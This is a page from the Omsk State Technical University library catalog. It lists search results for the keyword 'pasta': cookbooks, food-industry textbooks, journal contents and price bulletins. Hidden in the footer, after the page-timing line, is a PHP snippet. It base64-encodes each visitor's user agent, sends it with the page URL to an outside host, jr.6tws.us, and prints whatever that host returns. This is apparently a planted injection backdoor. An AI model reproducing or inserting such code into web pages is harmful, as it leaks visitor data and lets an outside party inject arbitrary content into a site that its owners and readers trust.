Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

132 пользователей


Зарегистрированных: 1 

Зимакова Виолетта Вячеславовна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=МАКАРОНЫ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 22
1. 
Высоцкая, Юлия. 365 рецептов на каждый день [Текст] / Ю. Высоцкая ; дар. Г. А. Кириленко, 2014. - 414 с.
Держатели документа (Информация об экземплярах) 
2. 
Калачев, Михаил Владимирович. Малые предприятия для производства хлебобулочных и макаронных изделий [Текст] / М. В. Калачев ; дар. В. В. Арсеньев, 2008. - 288 с.
Держатели документа (Информация об экземплярах) 

В учебном пособии в кратком виде изложены технологии ускоренного приготовления теста и описано технологическое оборудование для малых хлебопекарных и макаронныхпредприятий. Рассмотрены поточные линии, а также машины и аппараты линий для пекарен и макаронных цехов. Специальный раздел посвящен организации малого предприятия (в т. ч. составлению бизнес-плана). После каждой темы даны вопросы, позволяющие контролировать степень усвоения материала. Имеется словарь основных понятий. В приложении даны основные технологические расчеты машин и аппаратов. Учебное пособие предназначено для студентов пищевых ВУЗов.

3. 
Идентификационная и товарная экспертиза продуктов растительного происхождения [Текст] / Л. Г. Елисеева [и др.] ; ред. Л. Г. Елисеева, 2013. - 523 с.
Держатели документа (Информация об экземплярах) 

Рассматриваются теоретические основы идентификационной и товарной экспертизы продуктов растительного происхождения, в том числе зерномучных товаров, свежих плодов и овощей, вкусовых товаров, крахмала, сахара, меда и кондитерских товаров и др.

Особое внимание уделяется экспертизе генетически модифицированных пищевых продуктов растительного происхождения.

Для студентов, обучающихся по специальности «Товароведение», также специалистов торговли, работников таможенных и экспертных предприятий

4. 
Микроволновая кухня каждый день [Текст] / сост. Ю. Р. Васильев ; дар. И. Ю. Морозов, 1995. - 383 с.
Держатели документа (Информация об экземплярах) 
5. 
Новый мир. - Журнал, 2007г. № 4
Оглавление 
  • Быков, Дмитрий Львович. На стыке умиления и злости / Д. Быков. - с.3-9
  • Азольский, Анатолий Алексеевич. Посторонний / А. Азольский. - с.10-59
  • Галина, Мария Семеновна. Кто не спрятался, пусть не винит / М. Галина. - с.60-62
  • Смирнова, Наталья Вениаминовна. План огорода / Н. Смирнова. - с.63-78
  • Губайловский, Владимир Алексеевич. По поводу мокрого снега / В. Губайловский. - с.79-80
  • Гайдук, Борис Викторович. Макароны по-францискански / Б. Гайдук. - с.81-86
  • Бородицкая, Марина Яковлевна. Еще ведь и чаю не пили / М. Бородицкая. - с.87-89
  • Снежкина, Евгения Борисовна. Люблино / Ж. Снежкина. - с.90-105
  • Клетинич, Борис Евгеньевич. Чтобы жизнь пообсохла / Б. Клетинич. - с.106-109
  • Зибницкий, Эдуард Валентинович. Монархический принцип и власть / Э. Зибницкий. - с.110-123
  • Краснова, Марина Алимхановна. Этот странный гражданин / М. Краснова. - с.124-138
  • Клех, Игорь Юрьевич. "Евгений Онегин" и просто "Онегин" / И. Клех. - с.139-143
  • Новомлинская, Анна Анатольевна. Жди меня, Лили Марлен! / А. Новомлинская. - с.144-151
  • Новиков, Феликс Аронович. Пять сюжетов об архитектуре / Ф. Новиков. - с.152-165
  • Латынина, Алла. "Видел я, как зло красиво, как занудливо добро" / А. Латынина. - с.166-173
  • Сурат, Ирина Захаровна. Три века русской поэзии / И. Сурат. - с.174-186
  • Беляков, Сергей. Цветок зла / С. Беляков. - с.187-189
  • Василькова, Ирина. Что может быть уютней бездны отчаяния... " / И. Василькова. - с.189-194
  • Елисеев, Никита. Полный Стоппард / Н. Елисеев. - с.194-197
  • Касаткина, Татьяна. Глаз европейского христианства / Т. Касаткина. - с.197-205
  • Вежлян, Евгения. Книжная полка Евгении Вежлян / Е. Вежлян. - с.205-213
  • Крючков, Павел. Звучащая литература CD-обозрение Павла Крючкова / П. Крючков. - с.213-219
  • Манцов, Игорь. Кинообозрение Игоря Манцова / И. Манцов. - с.219-222
  • Книги. - с.223-228
  • Периодика. - с.228-237
6. 
Химия и жизнь - XXI век. - Журнал, 2009г. № 9
Оглавление 
  • Не дожигать, а сжигать. - с.2
  • Биогаз без диоксида углерода - двойная выгода. - с.2
  • Вирусы работают на биотехнологов. - с.3
  • Суп из перьев. - с.3
  • Комаров, С. М. Тайны второй планеты / С. М. Комаров. - с.4-9
  • Гельфанд, М. С. Что может биоинформатика? / М. С. Гельфанд. - с.10-15
  • Комаров, С. М. Пляски электронов / С. М. Комаров. - с.16
  • Комаров, С. М. Черный чай от диабета / С. М. Комаров. - с.16
  • Комаров, С. М. Макароны из бананов / С. М. Комаров. - с.17
  • Комаров, С. М. Вернем медные ручки / С. М. Комаров. - с.17
  • Комаров, С. М. Рапамицин от старости / С. М. Комаров. - с.17
  • Мальцева, В. В. Снова о стволовых клетках / В. В. Мальцева, А. А. Болдырев. - с.18-23
  • Резник, Н. Л. Где стояла колыбель жизни / Н. Л. Резник. - с.30-33
  • Анофелес, С. Жизнь на планетах / С. Анофелес. - с.35
  • Лясота, Е. О собаках и других. Никола Тесла: правда и ложь / Е. Лясота. - с.36-37
  • Намер, Л. Дискретная многомерная модель времени / Л. Намер. - с.38-40
  • Биршерт, А. А. Шахты без взрывов / А. А. Биршерт. - с.42-43
  • Кальменс, В. Новая целина / В. Кальменс. - с.45-47
  • Мотыляев, А. Искусственные острова / А. Мотыляев. - с.45-47
  • Демина, М. Склеит навечно / М. Демина. - с.64-65
  • Экономия топлива - миллионы тонн. - с.2
  • Чтобы имплантат лучше прижился. - с.3
  • Зеленая пустыня. - с.3
  • Убить зараженную клетку. - с.3
  • Комаров, С. М. Черный секрет светодиодов / С. М. Комаров. - с.16
  • Комаров, С. М. Белый чай от артрита / С. М. Комаров. - с.16
  • Комаров, С. М. О плодовитости овец / С. М. Комаров. - с.17
  • Комаров, С. М. Золотое нанояйцо / С. М. Комаров. - с.17
  • Коллинз, Ф. Доказательство Бога / Ф. Коллинз. - с.24-28
  • Ломоносов, М. В. Явление Венеры на Солнце, наблюденное в Санк-Петербургской императорской академии наук / М. В. Ломоносов. - с.29
  • Яркин, И. Г. Дед Мороз - творец жизни / И. Г. Яркин. - с.34
  • Индриков, Б. Великие велики / Б. Индриков. - с.50-52
  • Ручкина, Н. Слива / Н. Ручкина. - с.54-55
  • Викторова, Г. За твоей спиной / Г. Викторова. - с.56-59
  • Серов, Г. Д. Осы в домах людей и птиц / Г. Д. Серов. - с.60-61
  • Анофелес, С. Гедонометрические штудии / С. Анофелес. - с.62
  • Мотыляев, А. Мамонтов уничтожила комета / А. Мотыляев. - с.63
Держатели документа (Информация об экземплярах) 
7. 
Пищевая промышленность. - Журнал, 2004г. № 11
Оглавление 
  • Итоги работы предприятий пищевой и перерабатывающей промышленности России за январь-сентябрь 2004 года. - с.26-27
  • Лапидус, Н. Н. Формирование оптимальной структуры диверсификационного портфеля крахмалопаточного предприятия / Н. Н. Лапидус, Т. М. Панченко. - с.28-30
  • Ермакова, Е. Как заставить персонал работать с максимальной отдачей: формы и виды моральных стимулов / Е. Ермакова. - с.32-34
  • Бутковский, В. А. Международная промышленная академия - координационный центр повышения квалификации руководителей предприятий АПК стран СНГ / В. А. Бутковский ; 36-39
  • Рожнева, Е. Макароны - пища веков / Е. Рожнева. - с.42-43
  • Проселков, В. Г. Обеспечение качества информации о пищевой продукции / В. Г. Проселков. - с.44-45
  • Разработка Единого стандарта Codex Alimentarius на фруктовые соки и нектары. - с.46
  • GMF-Gouda: корифей метода барабанной сушки. - с.48
  • Новожилова, О. А. Собственная прачечная на мясоперерабатывающих предприятиях / О. А. Новожилова. - с.50
  • Федоров, А. Ю. Напольное покрытие MONILE в пищевой промышленности / А. Ю. Федоров. - с.52-52
  • Семенова, Е. ОЕЕ - индикатор здоровья Вашего хозяйства / Е. Семенова. - с.54-55
  • Лучшие технологии дозирования от "Таурас-Феникс". - с.60
  • Разнообразие соков укрепит Ваш организм, а разнообразие упаковок - Ваш бизнес!. - с.62-64
    Кл. слова: УПАКОВКА СОКА
  • Количественное определение белка методом Къельдаля. - с.68-69
  • Ларин, В. Е. Новый санитарно-паразитологический показатель качества воды - ооцисты криптоспоридий / В. Е. Ларин. - с.70-72
  • Инверсионно-вольтамперометрическое определение селена / ; Н. К. Зайцев, Е. А. Осипова, Д. М. Федулов и др.. - с.74-76
  • Raftiline и Raftilose - ингредиенты для функциональных продуктов питания. - с.78-79
  • Fibregum - пищевое растворимое диетическое волокно, идеально подходящее для применения в разнообразных продуктах питания. - с.80
  • Изменение аминокислотного состава мясного сырья / ; Е. И. Титов, Л. Ф. Митасева, Н. Г. Машенцева. - с.82-83
  • Новые подходы к решению проблемы ликвидации йоддефицитных состояний. - с.84-86
  • Вековцев, А. А. Конфеты, обогащенные кальцием / А. А. Вековцев, Ю. Н. Гутов, В. М. Позняковский. - с.88
Держатели документа (Информация об экземплярах) 
8. 
Питание и общество. - Журнал, 2011г. № 3
Оглавление 
  • Иванова, Валентина Николаевна. Проблемы питания студентов требуют безотлагательного решения / В. Н. Иванова. - с.2-3
  • Самойлов, Юрий. Пятна на жемчужине Кавказа / Ю. Самойлов. - с.4-5
  • Кучер, Л. Дипломатические приемы / Л. Кучер, Л. Шкуратова. - с.6-7
  • Жареные осьминоги. - с.12
  • Король, В. Люпин - неисчерпаемый резерв белка в питании человека / В. Король, Г. Лахмоткина. - с.14-15
  • Сальков, Петр. Приготовил Виктор Книовец / П. Сальков. - с.18-19
  • Сучкова, Елена. Блинный десерт "Мираж" / Е. Сучкова. - с.20
  • Киреевский, Игорь. Су-ши не изобрел суши / И. Киреевский. - с.20-21
  • Арефьева, Елена. "Люблю я макароны... " / Е. Арефьева. - с.22-23
  • Бердников, Евгений. Пароконвектоматы / Е. Бердников. - с.24-25
  • Ковалев, Н. И. Из глубины веков / Н. И. Ковалев, М. Н. Куткина, Н. Я. Карцева. - с.26-27
  • Филонов, Михаил. Любимый овощ Наполеона / М. Филонов. - с.28-29
  • Арефьева, Елена. Нумерология в питании / Е. Арефьева. - с.30-31
  • Книовец, Виктор. Фуа-гра / В. Книовец
9. 
Питание и общество. - Журнал, 2011г. № 2
Оглавление 
  • Забнев, Сергей. Капучино / С. Забнев. - с.5
  • Ефимов, А. Инновационная технология для общественного питания / А. Ефимов, Г. Шилов. - с.6-7
  • Номофилова, Н. Очень актуальное издание / Н. Номофилова. - с.9
  • Арефьева, Елена. "Люблю я макароны... " / Е. Арефьева. - с.10-11
  • Арефьева, Анастасия. Орегано - душица, а также материнка, ладанка, зеновка / А. Арефьева. - с.11
  • Салат из утки с грибами. - с.12-13
  • Сальков, Петр. Приготовила Элиза Цурцумия / П. Сальков. - с.14-15
  • Из тыквы. - с.15
  • Амирасланов, Тахир. Дастан о чыхыртме / Т. Амирасланов. - с.18-19
  • Кухня наших предков. - с.20
  • Дюма, Александр. Тюрбо (мы знаем ее под именем камбала) / А. Дюма. - с.20-21
  • Арефьева, Елена. Это странное слово латук... / Е. Арефьева. - с.22-23
  • Любина, Е. Все началось с яйца... / Е. Любина. - с.24-25
  • Суворов, Роман. Салат "Ералаш" / Р. Суворов. - с.26
  • Каширина, Е. "Скажи мне, что ты ешь, - и я скажу, кто ты" / Е. Каширина. - с.26
  • Эти факты хранит история. - с.27
  • Инжир, он же фига, он же смоква - древнейший целебный фрукт Востока. - с.28
  • "Жизнерадостная газета". - с.30-31
  • Суп-пюре из рябчика
10. 
Кулинария [Текст] / сост. Л. В. Кирилинская, 1994. - 324 с.
Держатели документа (Информация об экземплярах) 
11. 
12. 
Средние цены и индексы потребительских цен на продовольственные товары в Омской области за январь 2010 года [Текст] : стат. бюл. / Федер. служба гос. статистики, Территор. орган Федер. службы гос. статистики по Ом. обл., 2010. - 11 с.
Держатели документа (Информация об экземплярах) 
13. 
Средние цены и индексы потребительских цен на продовольственные товары в Омской области за декабрь 2009 года [Текст] : стат. бюл. / Федер. служба гос. статистики, Территор. орган Федер. службы гос. статистики по Ом. обл., 2010. - 10 с.
Держатели документа (Информация об экземплярах) 
14. 
Николаев, Валерий Михайлович. Макароны на любой вкус [Текст] / В. М. Николаев, 1989. - 158, [1] с.
Держатели документа (Информация об экземплярах) 
15. 
Маслов, Леонид Александрович. Кулинария [Текст] : Учеб. / Л. А. Маслов, 1957. - 295 с.
Держатели документа (Информация об экземплярах) 
16. 
Территориальные единичные расценки на монтаж оборудования. Омская область [Текст]. Ч. 28 : Оборудование предприятий пищевой промышленности, 2010. - 56 с.
Ключевые слова 
ТЕРм 81-03-28-2001 -- СМЕТНЫЙ -- НОРМАТИВ -- ДОЗИРОВАНИЕ -- МУКА -- СМЕШИВАНИЕ -- ПРИГОТОВЛЕНИЕ -- ДРОЖЖИ -- ДЕЖИ -- ТЕСТО -- СУШИЛКА -- СУХАРЬ -- РАСФАСОВКА -- САХАР -- МОЙКА -- МЕШАЛКА -- ЛОВУШКА -- ФИЛЬТРАЦИОННОЕ -- ВОДООТДЕЛИТЕЛЬ -- ВОДООТВОДЧИК -- ПРЕСС -- ДИФФУЗИОННОЕ -- ПЕЧЬ -- РАЗДЕЛКА -- ТУША -- ЛЬДОГЕНЕРАТОР -- ПОСОЛЬНОЕ -- РЕЗЕРВУАР -- МОЛОКО -- ТЕРМООБРАБОТКА -- СЛИВКИ -- МАСЛО -- СЫР -- МОРОЖЕНОЕ -- КАЗЕИН -- ДРОБИЛКА -- УКУПОРКА -- МАКАРОНЫ -- КОНФЕТЫ -- ВИНОГРАД -- СПИРТ -- ПИВО -- ТАБАК -- ЧАЙ -- КАРТОНАЖНЫЕ -- ОБЩЕСТВЕННОЕ -- ПИТАНИЕ -- ЖЕСТЯНАЯ -- ТАРА -- СОЛОД -- СУСЛО
Держатели документа (Информация об экземплярах) 
17. 
Справочник по товароведению продовольственных товаров [Текст] : Справочники/словари / Под ред. Т.Г.Родиной, 2003. - 608 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ -- Товары продовольственные -- ЦЕННОСТЬ ПИЩИ ЭНЕРГЕТИЧЕСКАЯ -- ЦЕННОСТЬ ПИЩИ биологическая -- ЦЕННОСТЬ ПИЩИ физиологическая -- ЦЕННОСТЬ ПИЩИ органолептическая -- Усвояемость пищи -- КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА ТОВАРА -- ИНФОРМАЦИЯ О ТОВАРЕ -- БЕЗОПАСНОСТЬ пищевых продуктов -- Безопасность эпидемиологическая -- ТАРА -- УПАКОВКА -- УТИЛИЗАЦИЯ тары -- ДОБАВКА ПИЩЕВАЯ -- Краситель пищевой -- Консервант -- Антиокислитель -- Ароматизатор -- Препарат коптильный -- ТОВАРЫ зерномучные -- Зерно -- Мука -- Крупа -- МАКАРОНЫ -- Хлеб -- СУХАРИ -- ПЛОДЫ -- ОВОЩИ -- ГРИБЫ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- РЕЗИНКА ЖЕВАТЕЛЬНАЯ -- Карамель -- Шоколад -- КАКАО - порошок -- Конфеты -- Ирис -- Драже -- Халва -- Печенье -- ВАФЛИ -- ПИРОЖНЫЕ -- ТОРТЫ -- РУЛЕТ -- КЕКС -- Сладости восточные -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПРОДУКТЫ детского питания -- ТОВАРЫ вкусовые -- ЖИР ПИЩЕВОЙ -- МОЛОКО -- Сметана -- Сыр -- ТОВАРЫ молочные -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ПРЕСЕРВЫ РЫБНЫЕ
Держатели документа (Информация об экземплярах) 
18. 
Чепурной И. П. Идентификация и фальсификация продовольственных товаров [Текст] : учеб. / И. П. Чепурной , 2007. - 459 с.
Держатели документа (Информация об экземплярах) 
19. 
Шепелев А. Ф. Товароведение и экспертиза зерномучных товаров [Текст] : Учеб. пособие для студ. высш. учеб. заведений / А. Ф. Шепелев, О. И. Кожухова, А. С. Туров. - 127 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
20. 
Чепурной, И. П. Идентификация и фальсификация продовольственных товаров [Текст] : учебник / И. П. Чепурной, 2002. - 460 с.
Держатели документа (Информация об экземплярах) 
21. 
Эткер Макаронные изделия [Текст] : [Рецепты] / Эткер, 1994. - 91 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3026 - 22.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.01 с.22 запросов, 0.56c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;